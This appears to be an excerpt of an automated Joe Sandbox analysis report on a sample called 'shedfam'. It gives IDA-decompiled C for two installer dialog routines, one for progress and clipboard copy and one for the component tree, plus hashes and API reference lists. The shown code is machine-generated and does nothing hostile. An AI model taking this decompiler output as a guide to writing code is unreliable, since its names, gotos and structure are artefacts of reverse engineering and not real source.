                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                                                  • Instruction ID: 89776e93a0172b97a38fb7948c015c90ed7fb14eba3da05579cbd58eb2c2bcc6
                                                                  • Opcode Fuzzy Hash: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                                                  • Instruction Fuzzy Hash: 87B01271644200BFDB214F00DF06F057B61A794701F108030B744380F082712830EB1E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 95%
                                                                  			E00405125(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                  				struct HWND__* _v8;
                                                                  				long _v12;
                                                                  				struct tagRECT _v28;
                                                                  				void* _v36;
                                                                  				signed int _v40;
                                                                  				int _v44;
                                                                  				int _v48;
                                                                  				signed int _v52;
                                                                  				int _v56;
                                                                  				void* _v60;
                                                                  				void* _v68;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				long _t87;
                                                                  				unsigned int _t92;
                                                                  				int _t94;
                                                                  				int _t95;
                                                                  				void* _t101;
                                                                  				intOrPtr _t123;
                                                                  				struct HWND__* _t127;
                                                                  				int _t149;
                                                                  				int _t150;
                                                                  				struct HWND__* _t154;
                                                                  				struct HWND__* _t158;
                                                                  				struct HMENU__* _t160;
                                                                  				long _t162;
                                                                  				void* _t163;
                                                                  				short* _t164;
                                                                  
                                                                  				_t154 =  *0x423764;
                                                                  				_t149 = 0;
                                                                  				_v8 = _t154;
                                                                  				if(_a8 != 0x110) {
                                                                  					if(_a8 == 0x405) {
                                                                  						CloseHandle(CreateThread(0, 0, E004050B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                  					}
                                                                  					if(_a8 != 0x111) {
                                                                  						L17:
                                                                  						if(_a8 != 0x404) {
                                                                  							L25:
                                                                  							if(_a8 != 0x7b || _a12 != _t154) {
                                                                  								goto L20;
                                                                  							} else {
                                                                  								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                                  								_a8 = _t87;
                                                                  								if(_t87 <= _t149) {
                                                                  									L37:
                                                                  									return 0;
                                                                  								}
                                                                  								_t160 = CreatePopupMenu();
                                                                  								AppendMenuA(_t160, _t149, 1, E00405D1D(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                                  								_t92 = _a16;
                                                                  								if(_t92 != 0xffffffff) {
                                                                  									_t150 = _t92;
                                                                  									_t94 = _t92 >> 0x10;
                                                                  								} else {
                                                                  									GetWindowRect(_t154,  &_v28);
                                                                  									_t150 = _v28.left;
                                                                  									_t94 = _v28.top;
                                                                  								}
                                                                  								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                                  								_t162 = 1;
                                                                  								if(_t95 == 1) {
                                                                  									_v60 = _t149;
                                                                  									_v48 = 0x420580;
                                                                  									_v44 = 0xfff;
                                                                  									_a4 = _a8;
                                                                  									do {
                                                                  										_a4 = _a4 - 1;
                                                                  										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                                                                  									} while (_a4 != _t149);
                                                                  									OpenClipboard(_t149);
                                                                  									EmptyClipboard();
                                                                  									_t101 = GlobalAlloc(0x42, _t162);
                                                                  									_a4 = _t101;
                                                                  									_t163 = GlobalLock(_t101);
                                                                  									do {
                                                                  										_v48 = _t163;
                                                                  										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                                  										 *_t164 = 0xa0d;
                                                                  										_t163 = _t164 + 2;
                                                                  										_t149 = _t149 + 1;
                                                                  									} while (_t149 < _a8);
                                                                  									GlobalUnlock(_a4);
                                                                  									SetClipboardData(1, _a4);
                                                                  									CloseClipboard();
                                                                  								}
                                                                  								goto L37;
                                                                  							}
                                                                  						}
                                                                  						if( *0x42374c == _t149) {
                                                                  							ShowWindow( *0x423f88, 8);
                                                                  							if( *0x42400c == _t149) {
                                                                  								E00404FE7( *((intOrPtr*)( *0x41fd50 + 0x34)), _t149);
                                                                  							}
                                                                  							E00403F90(1);
                                                                  							goto L25;
                                                                  						}
                                                                  						 *0x41f948 = 2;
                                                                  						E00403F90(0x78);
                                                                  						goto L20;
                                                                  					} else {
                                                                  						if(_a12 != 0x403) {
                                                                  							L20:
                                                                  							return E0040401E(_a8, _a12, _a16);
                                                                  						}
                                                                  						ShowWindow( *0x423750, _t149);
                                                                  						ShowWindow(_t154, 8);
                                                                  						E00403FEC(_t154);
                                                                  						goto L17;
                                                                  					}
                                                                  				}
                                                                  				_v52 = _v52 | 0xffffffff;
                                                                  				_v40 = _v40 | 0xffffffff;
                                                                  				_v60 = 2;
                                                                  				_v56 = 0;
                                                                  				_v48 = 0;
                                                                  				_v44 = 0;
                                                                  				asm("stosd");
                                                                  				asm("stosd");
                                                                  				_t123 =  *0x423f90;
                                                                  				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                  				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                  				 *0x423750 = GetDlgItem(_a4, 0x403);
                                                                  				 *0x423748 = GetDlgItem(_a4, 0x3ee);
                                                                  				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                  				 *0x423764 = _t127;
                                                                  				_v8 = _t127;
                                                                  				E00403FEC( *0x423750);
                                                                  				 *0x423754 = E00404889(4);
                                                                  				 *0x42376c = 0;
                                                                  				GetClientRect(_v8,  &_v28);
                                                                  				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                                  				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                                  				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                  				if(_a8 >= 0) {
                                                                  					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                  					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                  				}
                                                                  				if(_a12 >= _t149) {
                                                                  					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                                  				}
                                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                  				_push(0x1b);
                                                                  				E00403FB7(_a4);
                                                                  				if(( *0x423f98 & 0x00000003) != 0) {
                                                                  					ShowWindow( *0x423750, _t149);
                                                                  					if(( *0x423f98 & 0x00000002) != 0) {
                                                                  						 *0x423750 = _t149;
                                                                  					} else {
                                                                  						ShowWindow(_v8, 8);
                                                                  					}
                                                                  					E00403FEC( *0x423748);
                                                                  				}
                                                                  				_t158 = GetDlgItem(_a4, 0x3ec);
                                                                  				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                                  				if(( *0x423f98 & 0x00000004) != 0) {
                                                                  					SendMessageA(_t158, 0x409, _t149, _a12);
                                                                  					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                                  				}
                                                                  				goto L37;
                                                                  			}
































                                                                  0x0040512e
                                                                  0x00405134
                                                                  0x0040513d
                                                                  0x00405140
                                                                  0x004052d8
                                                                  0x004052fc
                                                                  0x004052fc
                                                                  0x0040530f
                                                                  0x0040532d
                                                                  0x00405334
                                                                  0x0040538b
                                                                  0x0040538f
                                                                  0x00000000
                                                                  0x00405396
                                                                  0x0040539e
                                                                  0x004053a6
                                                                  0x004053a9
                                                                  0x004054a2
                                                                  0x00000000
                                                                  0x004054a2
                                                                  0x004053b8
                                                                  0x004053c4
                                                                  0x004053ca
                                                                  0x004053d0
                                                                  0x004053e5
                                                                  0x004053eb
                                                                  0x004053d2
                                                                  0x004053d7
                                                                  0x004053dd
                                                                  0x004053e0
                                                                  0x004053e0
                                                                  0x004053fb
                                                                  0x00405403
                                                                  0x00405406
                                                                  0x0040540f
                                                                  0x00405412
                                                                  0x00405419
                                                                  0x00405420
                                                                  0x00405428
                                                                  0x00405428
                                                                  0x0040543f
                                                                  0x0040543f
                                                                  0x00405446
                                                                  0x0040544c
                                                                  0x00405455
                                                                  0x0040545c
                                                                  0x00405465
                                                                  0x00405467
                                                                  0x0040546a
                                                                  0x00405479
                                                                  0x0040547b
                                                                  0x00405481
                                                                  0x00405482
                                                                  0x00405483
                                                                  0x0040548b
                                                                  0x00405496
                                                                  0x0040549c
                                                                  0x0040549c
                                                                  0x00000000
                                                                  0x00405406
                                                                  0x0040538f
                                                                  0x0040533c
                                                                  0x0040536c
                                                                  0x00405374
                                                                  0x0040537f
                                                                  0x0040537f
                                                                  0x00405386
                                                                  0x00000000
                                                                  0x00405386
                                                                  0x00405340
                                                                  0x0040534a
                                                                  0x00000000
                                                                  0x00405311
                                                                  0x00405317
                                                                  0x0040534f
                                                                  0x00000000
                                                                  0x00405358
                                                                  0x00405320
                                                                  0x00405325
                                                                  0x00405328
                                                                  0x00000000
                                                                  0x00405328
                                                                  0x0040530f
                                                                  0x00405146
                                                                  0x0040514a
                                                                  0x00405153
                                                                  0x0040515a
                                                                  0x0040515d
                                                                  0x00405160
                                                                  0x00405163
                                                                  0x00405164
                                                                  0x00405165
                                                                  0x0040517e
                                                                  0x00405181
                                                                  0x0040518b
                                                                  0x0040519a
                                                                  0x004051a2
                                                                  0x004051aa
                                                                  0x004051af
                                                                  0x004051b2
                                                                  0x004051be
                                                                  0x004051c7
                                                                  0x004051d0
                                                                  0x004051f3
                                                                  0x004051f9
                                                                  0x0040520a
                                                                  0x0040520f
                                                                  0x0040521d
                                                                  0x0040522b
                                                                  0x0040522b
                                                                  0x00405230
                                                                  0x0040523e
                                                                  0x0040523e
                                                                  0x00405243
                                                                  0x00405246
                                                                  0x0040524b
                                                                  0x00405257
                                                                  0x00405260
                                                                  0x0040526d
                                                                  0x0040527c
                                                                  0x0040526f
                                                                  0x00405274
                                                                  0x00405274
                                                                  0x00405288
                                                                  0x00405288
                                                                  0x0040529c
                                                                  0x004052a5
                                                                  0x004052ae
                                                                  0x004052be
                                                                  0x004052ca
                                                                  0x004052ca
                                                                  0x00000000

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00405184
                                                                  • GetDlgItem.USER32 ref: 00405193
                                                                  • GetClientRect.USER32 ref: 004051D0
                                                                  • GetSystemMetrics.USER32 ref: 004051D8
                                                                  • SendMessageA.USER32 ref: 004051F9
                                                                  • SendMessageA.USER32 ref: 0040520A
                                                                  • SendMessageA.USER32 ref: 0040521D
                                                                  • SendMessageA.USER32 ref: 0040522B
                                                                  • SendMessageA.USER32 ref: 0040523E
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405260
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405274
                                                                  • GetDlgItem.USER32 ref: 00405295
                                                                  • SendMessageA.USER32 ref: 004052A5
                                                                  • SendMessageA.USER32 ref: 004052BE
                                                                  • SendMessageA.USER32 ref: 004052CA
                                                                  • GetDlgItem.USER32 ref: 004051A2
                                                                    • Part of subcall function 00403FEC: SendMessageA.USER32 ref: 00403FFA
                                                                  • GetDlgItem.USER32 ref: 004052E7
                                                                  • CreateThread.KERNEL32 ref: 004052F5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004052FC
                                                                  • ShowWindow.USER32(00000000), ref: 00405320
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405325
                                                                  • ShowWindow.USER32(00000008), ref: 0040536C
                                                                  • SendMessageA.USER32 ref: 0040539E
                                                                  • CreatePopupMenu.USER32 ref: 004053AF
                                                                  • AppendMenuA.USER32 ref: 004053C4
                                                                  • GetWindowRect.USER32 ref: 004053D7
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053FB
                                                                  • SendMessageA.USER32 ref: 00405436
                                                                  • OpenClipboard.USER32(00000000), ref: 00405446
                                                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040544C
                                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405455
                                                                  • GlobalLock.KERNEL32 ref: 0040545F
                                                                  • SendMessageA.USER32 ref: 00405473
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040548B
                                                                  • SetClipboardData.USER32 ref: 00405496
                                                                  • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040549C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID: {
                                                                  • API String ID: 590372296-366298937
                                                                  • Opcode ID: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                                                                  • Instruction ID: e424ca0b0cb309e3be77902d9308c86312c6ad68702b37108e1cfd0bc7beca4c
                                                                  • Opcode Fuzzy Hash: 04b6882ea7cea37b6f5b214f95382faacd07c0f71360ca926f2f0a7f5b2d3af5
                                                                  • Instruction Fuzzy Hash: 3FA13AB0900209BFDB11AFA1DD89AAE7F79FB44355F00803AFA05BA1E0C7795A41DF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 97%
                                                                  			E00404936(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                  				struct HWND__* _v8;
                                                                  				struct HWND__* _v12;
                                                                  				signed int _v16;
                                                                  				intOrPtr _v20;
                                                                  				void* _v24;
                                                                  				long _v28;
                                                                  				int _v32;
                                                                  				signed int _v40;
                                                                  				int _v44;
                                                                  				signed int* _v56;
                                                                  				intOrPtr _v60;
                                                                  				signed int _v64;
                                                                  				long _v68;
                                                                  				void* _v72;
                                                                  				intOrPtr _v76;
                                                                  				intOrPtr _v80;
                                                                  				void* _v84;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				struct HWND__* _t182;
                                                                  				int _t196;
                                                                  				long _t202;
                                                                  				signed int _t206;
                                                                  				signed int _t217;
                                                                  				void* _t220;
                                                                  				void* _t221;
                                                                  				int _t227;
                                                                  				signed int _t232;
                                                                  				signed int _t233;
                                                                  				signed int _t240;
                                                                  				struct HBITMAP__* _t250;
                                                                  				void* _t252;
                                                                  				char* _t268;
                                                                  				signed char _t269;
                                                                  				long _t274;
                                                                  				int _t280;
                                                                  				signed int* _t281;
                                                                  				int _t282;
                                                                  				long _t283;
                                                                  				int _t285;
                                                                  				long _t286;
                                                                  				signed int _t287;
                                                                  				long _t288;
                                                                  				signed int _t291;
                                                                  				signed int _t298;
                                                                  				signed int _t300;
                                                                  				signed int _t302;
                                                                  				int* _t310;
                                                                  				void* _t311;
                                                                  				int _t315;
                                                                  				int _t316;
                                                                  				int _t317;
                                                                  				signed int _t318;
                                                                  				void* _t320;
                                                                  
                                                                  				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                  				_t182 = GetDlgItem(_a4, 0x408);
                                                                  				_t280 =  *0x423fa8;
                                                                  				_t320 = SendMessageA;
                                                                  				_v8 = _t182;
                                                                  				_t315 = 0;
                                                                  				_v32 = _t280;
                                                                  				_v20 =  *0x423f90 + 0x94;
                                                                  				if(_a8 != 0x110) {
                                                                  					L23:
                                                                  					if(_a8 != 0x405) {
                                                                  						_t289 = _a16;
                                                                  					} else {
                                                                  						_a12 = _t315;
                                                                  						_t289 = 1;
                                                                  						_a8 = 0x40f;
                                                                  						_a16 = 1;
                                                                  					}
                                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                  						_v16 = _t289;
                                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                  							if(( *0x423f99 & 0x00000002) != 0) {
                                                                  								L41:
                                                                  								if(_v16 != _t315) {
                                                                  									_t232 = _v16;
                                                                  									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                  										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                  									}
                                                                  									_t233 = _v16;
                                                                  									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                  										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                  										} else {
                                                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                  										}
                                                                  									}
                                                                  								}
                                                                  								goto L48;
                                                                  							}
                                                                  							if(_a8 == 0x413) {
                                                                  								L33:
                                                                  								_t289 = 0 | _a8 != 0x00000413;
                                                                  								_t240 = E004048B6(_v8, _a8 != 0x413);
                                                                  								if(_t240 >= _t315) {
                                                                  									_t93 = _t280 + 8; // 0x8
                                                                  									_t310 = _t240 * 0x418 + _t93;
                                                                  									_t289 =  *_t310;
                                                                  									if((_t289 & 0x00000010) == 0) {
                                                                  										if((_t289 & 0x00000040) == 0) {
                                                                  											_t298 = _t289 ^ 0x00000001;
                                                                  										} else {
                                                                  											_t300 = _t289 ^ 0x00000080;
                                                                  											if(_t300 >= 0) {
                                                                  												_t298 = _t300 & 0xfffffffe;
                                                                  											} else {
                                                                  												_t298 = _t300 | 0x00000001;
                                                                  											}
                                                                  										}
                                                                  										 *_t310 = _t298;
                                                                  										E0040117D(_t240);
                                                                  										_t289 = 1;
                                                                  										_a8 = 0x40f;
                                                                  										_a12 = 1;
                                                                  										_a16 =  !( *0x423f98) >> 0x00000008 & 1;
                                                                  									}
                                                                  								}
                                                                  								goto L41;
                                                                  							}
                                                                  							_t289 = _a16;
                                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                  								goto L41;
                                                                  							}
                                                                  							goto L33;
                                                                  						} else {
                                                                  							goto L48;
                                                                  						}
                                                                  					} else {
                                                                  						L48:
                                                                  						if(_a8 != 0x111) {
                                                                  							L56:
                                                                  							if(_a8 == 0x200) {
                                                                  								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                  							}
                                                                  							if(_a8 == 0x40b) {
                                                                  								_t220 =  *0x42055c;
                                                                  								if(_t220 != _t315) {
                                                                  									ImageList_Destroy(_t220);
                                                                  								}
                                                                  								_t221 =  *0x420574;
                                                                  								if(_t221 != _t315) {
                                                                  									GlobalFree(_t221);
                                                                  								}
                                                                  								 *0x42055c = _t315;
                                                                  								 *0x420574 = _t315;
                                                                  								 *0x423fe0 = _t315;
                                                                  							}
                                                                  							if(_a8 != 0x40f) {
                                                                  								L86:
                                                                  								if(_a8 == 0x420 && ( *0x423f99 & 0x00000001) != 0) {
                                                                  									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                  									ShowWindow(_v8, _t316);
                                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                  								}
                                                                  								goto L89;
                                                                  							} else {
                                                                  								E004011EF(_t289, _t315, _t315);
                                                                  								if(_a12 != _t315) {
                                                                  									E0040140B(8);
                                                                  								}
                                                                  								if(_a16 == _t315) {
                                                                  									L73:
                                                                  									E004011EF(_t289, _t315, _t315);
                                                                  									_v32 =  *0x420574;
                                                                  									_t196 =  *0x423fa8;
                                                                  									_v60 = 0xf030;
                                                                  									_v16 = _t315;
                                                                  									if( *0x423fac <= _t315) {
                                                                  										L84:
                                                                  										InvalidateRect(_v8, _t315, 1);
                                                                  										if( *((intOrPtr*)( *0x42375c + 0x10)) != _t315) {
                                                                  											E00404871(0x3ff, 0xfffffffb, E00404889(5));
                                                                  										}
                                                                  										goto L86;
                                                                  									}
                                                                  									_t281 = _t196 + 8;
                                                                  									do {
                                                                  										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                  										if(_t202 != _t315) {
                                                                  											_t291 =  *_t281;
                                                                  											_v68 = _t202;
                                                                  											_v72 = 8;
                                                                  											if((_t291 & 0x00000001) != 0) {
                                                                  												_v72 = 9;
                                                                  												_v56 =  &(_t281[4]);
                                                                  												_t281[0] = _t281[0] & 0x000000fe;
                                                                  											}
                                                                  											if((_t291 & 0x00000040) == 0) {
                                                                  												_t206 = (_t291 & 0x00000001) + 1;
                                                                  												if((_t291 & 0x00000010) != 0) {
                                                                  													_t206 = _t206 + 3;
                                                                  												}
                                                                  											} else {
                                                                  												_t206 = 3;
                                                                  											}
                                                                  											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                  											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                  											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                  										}
                                                                  										_v16 = _v16 + 1;
                                                                  										_t281 =  &(_t281[0x106]);
                                                                  									} while (_v16 <  *0x423fac);
                                                                  									goto L84;
                                                                  								} else {
                                                                  									_t282 = E004012E2( *0x420574);
                                                                  									E00401299(_t282);
                                                                  									_t217 = 0;
                                                                  									_t289 = 0;
                                                                  									if(_t282 <= _t315) {
                                                                  										L72:
                                                                  										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                  										_a16 = _t282;
                                                                  										_a8 = 0x420;
                                                                  										goto L73;
                                                                  									} else {
                                                                  										goto L69;
                                                                  									}
                                                                  									do {
                                                                  										L69:
                                                                  										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                  											_t289 = _t289 + 1;
                                                                  										}
                                                                  										_t217 = _t217 + 1;
                                                                  									} while (_t217 < _t282);
                                                                  									goto L72;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                  							goto L89;
                                                                  						} else {
                                                                  							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                  							if(_t227 == 0xffffffff) {
                                                                  								goto L89;
                                                                  							}
                                                                  							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                  							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                  								_t283 = 0x20;
                                                                  							}
                                                                  							E00401299(_t283);
                                                                  							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                  							_a12 = 1;
                                                                  							_a16 = _t315;
                                                                  							_a8 = 0x40f;
                                                                  							goto L56;
                                                                  						}
                                                                  					}
                                                                  				} else {
                                                                  					 *0x423fe0 = _a4;
                                                                  					_t285 = 2;
                                                                  					_v28 = 0;
                                                                  					_v16 = _t285;
                                                                  					 *0x420574 = GlobalAlloc(0x40,  *0x423fac << 2);
                                                                  					_t250 = LoadBitmapA( *0x423f80, 0x6e);
                                                                  					 *0x420568 =  *0x420568 | 0xffffffff;
                                                                  					_v24 = _t250;
                                                                  					 *0x420570 = SetWindowLongA(_v8, 0xfffffffc, E00404F37);
                                                                  					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                  					 *0x42055c = _t252;
                                                                  					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                  					SendMessageA(_v8, 0x1109, _t285,  *0x42055c);
                                                                  					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                  						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                  					}
                                                                  					DeleteObject(_v24);
                                                                  					_t286 = 0;
                                                                  					do {
                                                                  						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                  						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                  							if(_t286 != 0x20) {
                                                                  								_v16 = _t315;
                                                                  							}
                                                                  							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D1D(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                                  						}
                                                                  						_t286 = _t286 + 1;
                                                                  					} while (_t286 < 0x21);
                                                                  					_t317 = _a16;
                                                                  					_t287 = _v16;
                                                                  					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                  					_push(0x15);
                                                                  					E00403FB7(_a4);
                                                                  					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                  					_push(0x16);
                                                                  					E00403FB7(_a4);
                                                                  					_t318 = 0;
                                                                  					_t288 = 0;
                                                                  					if( *0x423fac <= 0) {
                                                                  						L19:
                                                                  						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                  						goto L20;
                                                                  					} else {
                                                                  						_t311 = _v32 + 8;
                                                                  						_v24 = _t311;
                                                                  						do {
                                                                  							_t268 = _t311 + 0x10;
                                                                  							if( *_t268 != 0) {
                                                                  								_v60 = _t268;
                                                                  								_t269 =  *_t311;
                                                                  								_t302 = 0x20;
                                                                  								_v84 = _t288;
                                                                  								_v80 = 0xffff0002;
                                                                  								_v76 = 0xd;
                                                                  								_v64 = _t302;
                                                                  								_v40 = _t318;
                                                                  								_v68 = _t269 & _t302;
                                                                  								if((_t269 & 0x00000002) == 0) {
                                                                  									if((_t269 & 0x00000004) == 0) {
                                                                  										 *( *0x420574 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                  									} else {
                                                                  										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                  									}
                                                                  								} else {
                                                                  									_v76 = 0x4d;
                                                                  									_v44 = 1;
                                                                  									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                  									_v28 = 1;
                                                                  									 *( *0x420574 + _t318 * 4) = _t274;
                                                                  									_t288 =  *( *0x420574 + _t318 * 4);
                                                                  								}
                                                                  							}
                                                                  							_t318 = _t318 + 1;
                                                                  							_t311 = _v24 + 0x418;
                                                                  							_v24 = _t311;
                                                                  						} while (_t318 <  *0x423fac);
                                                                  						if(_v28 != 0) {
                                                                  							L20:
                                                                  							if(_v16 != 0) {
                                                                  								E00403FEC(_v8);
                                                                  								_t280 = _v32;
                                                                  								_t315 = 0;
                                                                  								goto L23;
                                                                  							} else {
                                                                  								ShowWindow(_v12, 5);
                                                                  								E00403FEC(_v12);
                                                                  								L89:
                                                                  								return E0040401E(_a8, _a12, _a16);
                                                                  							}
                                                                  						}
                                                                  						goto L19;
                                                                  					}
                                                                  				}
                                                                  			}


























































                                                                  0x00404954
                                                                  0x0040495a
                                                                  0x0040495c
                                                                  0x00404962
                                                                  0x00404968
                                                                  0x00404975
                                                                  0x0040497e
                                                                  0x00404981
                                                                  0x00404984
                                                                  0x00404bac
                                                                  0x00404bb3
                                                                  0x00404bc7
                                                                  0x00404bb5
                                                                  0x00404bb7
                                                                  0x00404bba
                                                                  0x00404bbb
                                                                  0x00404bc2
                                                                  0x00404bc2
                                                                  0x00404bd3
                                                                  0x00404be1
                                                                  0x00404be4
                                                                  0x00404bfa
                                                                  0x00404c72
                                                                  0x00404c75
                                                                  0x00404c77
                                                                  0x00404c81
                                                                  0x00404c8f
                                                                  0x00404c8f
                                                                  0x00404c91
                                                                  0x00404c9b
                                                                  0x00404ca1
                                                                  0x00404cc2
                                                                  0x00404ca3
                                                                  0x00404cb0
                                                                  0x00404cb0
                                                                  0x00404ca1
                                                                  0x00404c9b
                                                                  0x00000000
                                                                  0x00404c75
                                                                  0x00404bff
                                                                  0x00404c0a
                                                                  0x00404c0f
                                                                  0x00404c16
                                                                  0x00404c1d
                                                                  0x00404c27
                                                                  0x00404c27
                                                                  0x00404c2b
                                                                  0x00404c30
                                                                  0x00404c35
                                                                  0x00404c4b
                                                                  0x00404c37
                                                                  0x00404c37
                                                                  0x00404c3f
                                                                  0x00404c46
                                                                  0x00404c41
                                                                  0x00404c41
                                                                  0x00404c41
                                                                  0x00404c3f
                                                                  0x00404c4f
                                                                  0x00404c51
                                                                  0x00404c5f
                                                                  0x00404c60
                                                                  0x00404c6c
                                                                  0x00404c6f
                                                                  0x00404c6f
                                                                  0x00404c30
                                                                  0x00000000
                                                                  0x00404c1d
                                                                  0x00404c01
                                                                  0x00404c08
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404cc5
                                                                  0x00404cc5
                                                                  0x00404ccc
                                                                  0x00404d40
                                                                  0x00404d47
                                                                  0x00404d53
                                                                  0x00404d53
                                                                  0x00404d5c
